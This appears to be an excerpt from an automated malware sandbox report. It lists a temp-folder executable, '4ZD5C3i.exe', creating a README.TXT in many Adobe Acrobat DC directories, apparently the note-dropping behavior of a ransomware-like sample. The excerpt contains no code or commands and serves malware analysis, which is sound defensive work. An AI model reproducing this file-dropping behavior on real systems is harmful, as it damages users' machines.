                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\ICU\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\Mappings\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\CAN\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\DEU\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\ENU\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\FRA\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\UK\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\JPN\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\fonts\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\Mappings\Adobe\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\Mappings\Mac\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\Mappings\win\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\__VERSION__\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\prod\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\stage\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\fonts\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\app\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\core\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\files\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\__VERSION__\private\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\hi_contrast\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app-api\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\misc\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\versions\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win-scrollbar\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win8-scrollbar\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\app\dev\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\core\dev\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\files\dev\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app-api\dev\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\hi_contrast\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\themes\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\microsoftGraph\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\require\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\collect_feedback\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files-select\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files-select\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\send-for-sign\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sign-services-auth\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\signatures\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\task-handler\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\tracked-send\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\uss-search\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\dark\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win-scrollbar\themes\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win8-scrollbar\themes\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\app\dev\cef\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\app\dev\libs\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\core\dev\cef\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\core\dev\libs\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\files\dev\cef\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\files\dev\libs\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\0.2.2\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\themes\dark\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\require\2.1.15\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\collect_feedback\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\collect_feedback\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\img\README.TXT
